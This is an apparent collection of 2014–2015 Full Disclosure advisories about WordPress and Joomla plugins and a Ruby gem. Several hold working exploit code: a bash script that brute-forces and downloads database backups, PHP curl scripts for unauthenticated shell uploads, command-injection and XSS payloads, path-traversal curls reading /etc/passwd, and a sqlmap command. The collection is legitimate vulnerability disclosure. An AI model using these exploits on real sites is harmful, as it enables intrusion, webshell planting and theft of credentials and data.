Title: XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1
(Joomla!) Vulnerabilities
Author: Larry W. Cashdollar, @_larry0
Date: 10/17/2014
Download: https://wordpress.org/plugins/xcloner-backup-and-restore/
Download:
http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665
Downloads: Wordpress 313,647 Joomla! 515745 StandAlone 69175
Website: http://www.xcloner.com
Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/
Vendor: Notified 10/17/14 Ovidiu Liuta, @thinkovi Acknowledged & no other
response.
CVEID: Requested, TDB.
OSVDBID:114176,114177,114178,114179,114180
Description: “XCloner is a Backup and Restore component designed for PHP/Mysql
websites, it can work as a native plugin for WordPress and Joomla!.”
Vulnerabilities: There are multiple vulnerabilities I’ve discovered in this
plugin, they are as follows.
1. Arbitrary command execution.
2. Clear text MySQL password exposure through html text box under configuration
panel.
3. Database backups exposed to local users due to open file permissions.
4. Unauthenticated remote access to backup files via easily guessable file
names.
5. Authenticated remote file access.
6. MySQL password exposed to process table.
Arbitrary Command Execution
Plugin allows arbitrary commands to be executed by an authenticated user. The
user will require administrative access rights to backup the database. User
input when specifying your own file name is not sanitized as well as various
other input fields.
PoC
All input fields I believe are vulnerable, I’ve chosen the backup filename and
a wget of sh.txt which is simply into a writeable
directory by www-data.
Screenshots available at the advisory URL above.
All user configurable variables are vulnerable, these variables need to be
sanitized before being passed to the exec() function for execution.
$_CONFIG[tarpath]
$exclude
$_CONFIG['tarcompress']
$_CONFIG['filename']
$_CONFIG['exfile_tar']
$_CONFIG[sqldump]
$_CONFIG['mysql_host']
$_CONFIG['mysql_pass']
$_CONFIG['mysql_user']
$database_name
$sqlfile
$filename
Vulnerable code
./cloner.functions.php:
1672 exec($_CONFIG[tarpath] . " $exclude -c" . $_CONFIG['tarcompress'] .
"vf $filename ./administrator/backups/index.html");
1673 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf
$filename --update ./administrator/backups/database-sql.sql");
1674 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf
$filename --update ./administrator/backups/htaccess.txt");
1675 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf
$filename --update ./administrator/backups/perm.txt");
1695- if ($_REQUEST[cron_dbonly] != 1) {
1696: exec($_CONFIG[tarpath] . " $excl_cmd " . " -X " .
$_CONFIG['exfile_tar'] . " -chv" . $_CONFIG['tarcompress'] . "f $filename ./");
1697- } else {
1698-
1699-
1700: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "cvf
$filename ./administrator/backups/database-sql.sql");
1701-
1702- if (is_array($databases_incl)) {
1703- foreach ($databases_incl as $database_name)
1704- if ($database_name != "") {
1705: exec($_CONFIG[tarpath] . " -" .
$_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/" .
$database_name . "-sql.sql");
1706- }
1707- }
1708- }
--
1873- {
1874- //$sizeInBytes = filesize($path);
1875- $sizeInBytes = sprintf("%u", filesize($path));
1876: if ((!$sizeInBytes) and (function_exists("exec"))){
1877- $command = "ls -l \"$path\" | cut -d \" \" -f 5";
1878: $sizeInBytes = @exec($command);
1879- }
2010- if ($_CONFIG['sql_mem']) {
2011: exec($_CONFIG[sqldump] . " -h " . $_CONFIG['mysql_host'] . " -u
" . $_CONFIG['mysql_user'] . " -p" . $_CONFIG['mysql_pass'] . " " . $dbname . "
> " . $sqlfile . " $drop --allow-k
eywords " . $ex_dump);
2012-
2013- if (get_filesize($sqlfile) > 0)
2014- $databaseResult = LM_DATABASE_BACKUP_COMPLETED . ' ( ' .
getFileSizeText(get_filesize($sqlfile)) . ' )';
2015- else
2016- $databaseResult = LM_MSG_BACK_14;
2017-
2018: exec("chmod 777 $sqlfile");
2019-
2020- return $sqlfile;
2021- }
./classes/fileRecursion.php
339-public static function getFileSize($file){
340-
341-
[FD] Exploit for stealing backups on WP sites with WP-DB-Backup v2.2.4 plugin
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4
plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is
wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite
DATE="20141031"; #Date to search
if [ ! -e rainbow ]; then
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path
Larry W. Cashdollar*/
#include
int
main (void)
{
char string[16] = "0123456789abcdef";
int x, y, z, a, b;
for (x = 0; x < 16; x++)
for (y = 0; y < 16; y++)
for (z = 0; z < 16; z++)
for (a = 0; a < 16; a++)
for (b = 0; b < 16; b++)
printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
string[a], string[b]);
return(0);
}
-EOF-
echo "[+] Compiling rbow.c"
gcc rbow.c -o rbow
echo "[+] Creating rainbow table..."
./rbow > rainbow
fi
if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo "[+] Searching";
for x in `cat rainbow`; do
CPATH="http://$1/wp-content/backup-$x/";;
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo $x > found.txt;
break; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=6;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done
else
x=`cat found.txt`;
fi
# Now that we have the directory lets try to locate the database backup file.
K=999;
for y in `seq -w 0 999`; do
CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql";;
#change WP Database Name and Table Prefix here
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Database backup $CPATH Found";
echo "[+] Received $RESULT";
wget $CPATH
exit; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=2;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done
___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
Download Site: https://rubygems.org/gems/xaviershay-dm-rails
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal [at] rhnh.net
Description: This gem provides the railtie that allows datamapper to hook into
rails3 and thus behave like a rails framework component. Just like activerecord
does in rails, dm-rails uses the railtie API to hook into rails. The two are
actually hooked into rails almost identically.
Vulnerability:
The problem is with the execute function exposing the user credentials to the
process table.
Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb:
def execute(statement)
system(
'mysql',
(username.blank? ? '' : "--user=#{username}"),
(password.blank? ? '' : "--password=#{password}"),
'-e',
statement
)
end
OSVDB:118579
Exploit Code:
• $ while (true) do ps -ef |grep [p]assword; done
Advisory: http://www.vapid.dhs.org/advisory.php?v=115
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Title: Remote file upload vulnerability in
videowhisper-video-conference-integration wordpress plugin v4.91.8
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site:
https://wordpress.org/support/plugin/videowhisper-video-conference-integration
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won’t fix.
http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=116
Description: From their site "VideoWhisper Video Conference is a modern web
based multiple way video chat and real time file sharing tool. Read more on
WordPress Video Conference plugin home page."
Vulnerability:
./videowhisper-video-conference-integration/vc/vw_upload.php Allows various
remote unauthenticated file uploads, among the file types is html where the
last 4 characters are only being checked in a file name to match which types
are allowed. Because of this .shtml can be passed through and remote code
execution is SSI is allowed. The code does not do any user access validation
and therefore anyone can upload the following files to an unsuspecting
wordpress site:
.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps
The
if (strstr($filename,'.php')) exit;
can be by passed by using the extension .Php but the file extension check
would allow files like test.Php.shtml
./videowhisper-video-conference-integration/vc/vw_upload.php
loadstatus=1
CVEID: TBD
OSVDB: TBD
Exploit Code:
videowhisp_poc.php
http://target_site/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php";);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
upexp.shtml
this is html
The executeable should be located in
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Title: Remote file upload vulnerability in wordpress plugin
videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31 won’t fix,
http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site
"VideoWhisper Video Consultation is a web based video communication solution
designed for online video consultations, interactive live presentations,
trainings, webinars, coaching and online collaboration with webcam support.
Read more on WordPress Video Presentation plugin home page."
Vulnerability:
From wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php Allows
various remote unauthenticated file uploads, among the file types is html where
the last 4 characters are only being checked in a file name to match which
types are allowed. Because of this .shtml can be passed through and remote code
execution if SSI is allowed. The code does not do any user access validation
and therefore anyone can upload the following files to an unsuspecting
wordpress site:
.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps
The
if (strstr($filename,'.php')) exit;
can be by passed by using the extension .Php but the file extension check would
allow files like test.Php.shtml
loadstatus=1
CVEID: TBD
OSVDB: TBD
Exploit Code:
videowhis_poc.php
http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php";);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
upexp.shtml
this is html
The executeable should be located in
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Hello Folks, You can get php execution by using the file extension .phtml for both of these advisories. I'm currently updating the advisories and the vendor. Try using an uncommon extension not defined in /etc/mime.types. $ grep "#app" /etc/mime.types #application/vnd.ms-pki.stl stl #application/x-httpd-eruby rhtml #application/x-httpd-phpphtml pht php #application/x-httpd-php-source phps #application/x-httpd-php3 php3 #application/x-httpd-php3-preprocessed php3p #application/x-httpd-php4 php4 #application/x-httpd-php5 php5 > On Mar 31, 2015, at 9:54 PM, Larry W. Cashdollar wrote: > > Title: Remote file upload vulnerability in > videowhisper-video-conference-integration wordpress plugin v4.91.8 > Author: Larry W. Cashdollar, @_larry0 > Date: 2015-03-29 > Download Site: > https://wordpress.org/support/plugin/videowhisper-video-conference-integration > Vendor: http://www.videowhisper.com/ > Vendor Notified: 2015-03-31, won’t fix. > http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822 > Vendor Contact: http://www.videowhisper.com/tickets_submit.php > Advisory: http://www.vapid.dhs.org/advisory.php?v=116 > Description: From their site "VideoWhisper Video Conference is a modern web > based multiple way video chat and real time file sharing tool. Read more on > WordPress Video Conference plugin home page." ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Xloner v3.1.2 wordpress plugin authenticated command execution and XSS
This advisory is in addition to the one I filed in November
http://www.openwall.com/lists/oss-security/2014/11/06/1 that had the following
CVEs
assigned CVE-2014-8603 CVE-2014-8604 CVE-2014-8605 CVE-2014-8606 CVE-2014-8607,
advisory http://www.vapid.dhs.org/advisory.php?v=110.
Title: Xloner v3.1.2 wordpress plugin authenticated command execution and XSS
Author: Larry W. Cashdollar, @_larry0
Date: 2015-05-10
Download Site: https://wordpress.org/plugins/xclonerbackupandrestore/
http://extensions.joomla.org/extensions/accessasecurity/ sitesecurity/
backup/665
Advisory: http://www.vapid.dhs.org/advisory.php?v=121
Vendor: Ovidiu Liuta, @thinkovi
Vendor Contact: @thinkovi
Description: XCloner is a Backup and Restore component designed for PHP/Mysql
websites, it can work as a native plugin for WordPress and Joomla!
Vulnerability:
Lines 1129 of 1135 in cloner.functions.php
1129 $excluded_cmd = "";
1130 if ($fp = @fopen($_REQUEST['
1130 if ($fp = @fopen($_REQUEST['excl_manual'], "r")) {
1131 while (!feof($fp))
1132 $excluded_cmd .= fread($fp, 1024);
1133
1134 fclose($fp);
1135 }
Line 1205:
If configured for manual mode the contents of $excluded_cmd are passed to
exec();
1205 exec($_CONFIG[tarpath] . " $excluded_cmd ". $_CONFIG['tarcompress'] ."vf
$backup_file update $file");
We need to supply a file with a list of commands to execute in it, we can
create this via the backup comments feature. It creates a file under
administrator/backups/.comments with whatever you want in it. Like
;id>/tmp/w00t;
Then change the configuration to manual backup by selecting the radio button
and perform a backup.
Hit this link:
http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=300&lines=6204&backup=backup_20150511_
2028_sqlnodrop.tar&excl_manual=/usr/share/wordpress/administrator/backups/.comments
In a shell:
$ cat /tmp/w00t
uid=33(wwwdata)
gid=33(wwwdata)
groups=33(wwwdata)
Also $excluded_cmd is XSS
http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=800&lines=6204&backup=backup_20150511_
2028_sqlnodrop.tar&excl_manual=’>alert(‘w00t’);
Chrome XSS alert:
The XSS Auditor refused to execute a script in
'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_…lnodrop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E'
because
its source code was found within the request. The auditor was enabled as the
server sent
neither an 'XXSSProtection' nor 'ContentSecurityPolicy' header.
plugins.php:403 The XSS Auditor refused to execute a script in
'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_…lno
drop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E' because
its source code was found within the request. The auditor was enabled as the
server sent
neither an 'XXSSProtection' nor 'ContentSecurityPolicy' header.
The default template has an error with the LM_LOGIN_TEXT field so just clean
that out or you’ll get a syntax error when trying to execute.
Adding foo”);phpinfo();define(“foo to the Translation LM_FRONT_* fields then
browsing to language/italian.php you’ll execute phpinfo();.
CVEID: 2015-4336 2015-4337 2015-4338
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Title: Remote file upload vulnerability in
aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site:
https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plug...@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly
Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in
aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an
unauthenticated user can upload any file to the system. Including a .php file.
The upload.php doesn't check that the user is authenticated and a simple post
will allow arbitrary code to be uploaded to the server.
In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
the code doesn’t check for an authenticated Wordpress user:
1 $max_file_size ){
15 $msg = "File Size is too big.";
16 $error_flag = true;
17 }
18 $extension = strtolower(end(explode('.', $image_file['name'])));
19 $aa_options = get_option('gf_aa_options');
20 $supported_files = $aa_options['supported_file_format'];
21 $supported_files = strtolower($supported_files);
22 if(!$error_flag && $supported_files != '' ){
23$supported_files = explode (',', $supported_files);
24if(!in_array($extension, $supported_files)){
25 $msg = "No Supported file.";
26 $error_flag = true;
27}
28 }
29 if(!$error_flag){
30 $wp_upload_dir = wp_upload_dir();
31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
32 mkdir($wp_upload_dir['basedir'].'/gform_aviary');
33 }
34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
36 $file_name =
$upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){
38 $file_url =
$upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
39 }
40 }
41 $return_obj = array('status' => 'success', 'message' => $file_url);
42 echo json_encode($return_obj);
43 }
44 ?>
CVEID: 2015-4455
OSVDB:
Exploit Code:
• http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
• */
•
•
•$target_url =
'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/
• upload.php';
•$file_name_with_full_path = '/var/www/shell.php';
•
•echo "POST to $target_url $file_name_with_full_path";
•$post = array('name' =>
'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
•
•$ch = curl_init();
•curl_setopt($ch, CURLOPT_URL,$target_url);
•curl_setopt($ch, CURLOPT_POST,1);
•curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
•curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
•$result=curl_exec ($ch);
•curl_close ($ch);
•echo "";
•echo $result;
•echo "";
• ?>
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file download vulnerability in download-zip-attachments v1.0
Title: Remote file download vulnerability in download-zip-attachments v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-10 Download Site: https://wordpress.org/plugins/download-zip-attachments/ Vendor: rivenvirus Vendor Notified: 2015-06-15 Vendor Contact: https://profiles.wordpress.org/rivenvirus/ Advisory: http://www.vapid.dhs.org/advisory.php?v=129 Description: Download all attachments from the post into a zip file. Vulnerability: from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory. forceDownload($tmp_location,false); unlink($tmp_location); exit; } CVEID: 2015-4704 OSVDB: Exploit Code: • http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete
WordPress installation. This plugin allows you to rename WordPress database,
WordPress directory, change every necessary configuration file, easily from one
page.
Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is
within the intended download directory:
try{
$dbname = $_GET["dbname"];
$dumpfname = $_GET["dumpfname"];
$backup_folder = $_GET["backup_folder"];
}catch (Exception $e){}
if(empty($backup_folder)){
$backup_folder="backup/";
}
echo "$dumpfname";
if (file_exists($dumpfname)) {
// zip the dump file
$name=$dbname . "_" . date("Y-m-d");
$zipfname = $backup_folder.$name.".zip";
$zip = new ZipArchive();
if($zip->open($zipfname,ZIPARCHIVE::CREATE))
{
$zip->addFile($dumpfname,$dumpfname);
$zip->close();
}
// read zip file and send it to standard output
if (file_exists($zipfname)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment;
filename='.basename($zipfname));
flush();
readfile($zipfname);
CVEID: 2015-4703
OSVDB:
Exploit Code:
• curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=."
http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQL Injection in easy2map wordpress plugin v1.24
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking
Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent
to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.
90 $wpdb->query(sprintf("UPDATE $mapsTable
91 SET PolyLines = '%s'
92 WHERE ID = '%s';", $PolyLines, $mapID));
.
.
.
163 $wpdb->query(sprintf("
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;",
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items["mapCSSXML"]),
180 urldecode($Items["listCSSXML"]),
181 urldecode($Items["headingCSSXML"]),
182 urldecode($Items["mapHTML"]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186
187 //this is a map insert
188 if (!$wpdb->query(sprintf("
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s',
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0,
'%s');",
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '',
easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items["mapCSSXML"]),
208 urldecode($Items["listCSSXML"]),
209 urldecode($Items["headingCSSXML"]),
210 urldecode($Items["mapHTML"]),
211 $Items['mapThemeName'])))
.
.
267 $wpdb->query(sprintf("
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;", $mapName, $mapID));
In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing
../ to create files outside of intended directory:
4 $imagesDirectory = WP_CONTENT_DIR .
"/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12
13 if (!file_exists($imagesDirectory)) {
14 mkdir($imagesDirectory);
15 }
CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php'
--data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name"
--cookie=‘COOKIE HERE’ --level=5 --risk=3
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-05 Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling Vendor: https://profiles.wordpress.org/haet/ Vendor Notified: 2015-07-05, fixed in version 2.6. Vendor Contact: http://wpshopstyling.com Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders. Vulnerability: The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded. 1 You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with path. CVEID: Requested TBD OSVDB: TBD Exploit Code: • $ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
Vendor: https://profiles.wordpress.org/mukto90/
Vendor Notified: 2015-07-01, removed vulnerable code.
Vendor Contact: n.mu...@gmail.com
Description: MDC YouTube Downloader allows visitors to download YouTube videos
directly from your WordPress site.
Vulnerability:
The code in mdc-youtube-downloader/includes/download.php doesn't restrict
access to the local file system allowing sensitive files to be
downloaded:
$file_name = $_GET['file'];
// make sure it's a file before doing anything!
if(is_file($file_name)) {
.
.
.
switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
case 'pdf': $mime = 'application/pdf'; break;
case 'zip': $mime = 'application/zip'; break;
case 'jpeg':
case 'jpg': $mime = 'image/jpg'; break;
default: $mime = 'application/force-download';
}
header('Pragma: public'); // required
header('Expires: 0'); // no cache
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime
($file_name)).' GMT');
header('Cache-Control: private',false);
header('Content-Type: '.$mime);
header('Content-Disposition: attachment;
filename="'.basename($file_name).'"');
header('Content-Transfer-Encoding: binary');
header('Content-Length: '.filesize($file_name));// provide file
size
header('Connection: close');
readfile($file_name); // push it out
exit();
CVEID: Requested, TBD.
OSVDB: TBD.
Exploit Code:
• $ curl
http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam
v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to
run a swim team including registration, volunteer assignments, scheduling, and
much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input
from downloading sensitive system files:
50 $file = urldecode($args['file']) ;
51 $fh = fopen($file, 'r') or die('Unable to load file, something
bad has happened.') ;
52
53 while (!feof($fh))
54 $txt .= fread($fh, 1024) ;
55
56 // Clean up the temporary file - permissions
57 // may prevent this from succeedeing so use the '@'
58 // to suppress any messages from PHP.
59
60 @unlink($file) ;
61 }
62
63 $filename = urldecode($args['filename']) ;
64 $contenttype = urldecode($args['contenttype']) ;
65
66 // Tell browser to expect a text file of some sort (usually txt or
csv)
67
68 header(sprintf('Content-Type: application/%s', $contenttype)) ;
69 header(sprintf('Content-disposition: attachment; filename=%s',
$filename)) ;
70 print $txt ;
CVEID:
OSVDB:
Exploit Code:
• $ curl
"http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress";
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQL Injection in easy2map-photos wordpress plugin v1.09
Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
